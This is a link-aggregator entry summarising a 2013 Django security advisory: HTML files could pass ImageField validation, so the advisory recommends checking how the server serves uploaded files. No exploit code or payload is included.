Security advisory: ImageField abuse

Editor Rating

posted on dec 03 by djangolinks

django imagefield phishing security

  • ID: 315
  • Title:

    Security advisory: ImageField abuse

  • Url: http://www.djangoproject.com/weblog/2013/dec/02/image-field-advisory/
  • Description: We've received a report of a means of allowing an HTML file to be uploaded via Django's ImageField. As ImageField is expected to validate for a valid image file, this provides an attack vector for someone to upload a phishing form, something to steal cookies, or something else malicious. Unfortunately, we cannot offer a solution in Django itself. Rather, you need to take some steps in how you serve static files in order to mitigate this type of attack. These steps are now outlined in our security guide. We recommend that if you allow image uploads that you check your server's configuration against the guide.
  • Total Votes: 0

Latest Premium Django Jobs from Djangojobs.Net

Full Stack Python / Django Engineer
Django Developer 100% (Zurich)
Django Developer 100% (Australia)
Python Developer - Django
Python / Django Developer